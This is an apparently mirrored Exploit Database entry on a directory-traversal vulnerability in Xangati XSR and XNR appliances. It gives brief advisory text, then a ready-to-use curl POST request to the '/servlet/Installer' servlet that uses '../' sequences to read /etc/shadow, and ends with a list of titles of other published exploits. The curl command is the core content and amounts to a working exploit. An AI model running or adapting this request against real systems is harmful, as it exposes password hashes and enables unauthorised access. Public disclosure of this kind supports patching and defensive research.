Xangati – ‘/servlet/Installer?file’ Directory Traversal

Exploit Database
36 阅读

作者： Jan Kadijk

日期： 2014-04-14
类别：
- webapps
平台：
- jsp
来源：https://www.exploit-db.com/exploits/39143/

source: https://www.securityfocus.com/bid/66817/info
 
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
 
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
 
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 

curl -i -s -k-X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/Installer'

last Exploits
Xangati – ‘/servlet/Installer?file’ Directory Traversal的更多信息

Bitweaver 2.8.1 – Multiple Vulnerabilities：
WordPress Plugin Select All Categories and Taxonomies 1.3.1 – Reflected Cross-Site Scripting (XSS)：
ZTE ZXDSL-931VII – Configuration Dump：
CmsMadeSimple v2.2.17 – session hijacking via Server-Side Template Injection (SSTI)：
Argus Surveillance DVR 4.0.0.0 – Directory Traversal：
WordPress Plugin Plainview Activity Monitor 20161228 – (Authenticated) Command Injection：
CuteNews 2.1.2 – Arbitrary File Deletion：
FS Groupon Clone – ‘category’ SQL Injection：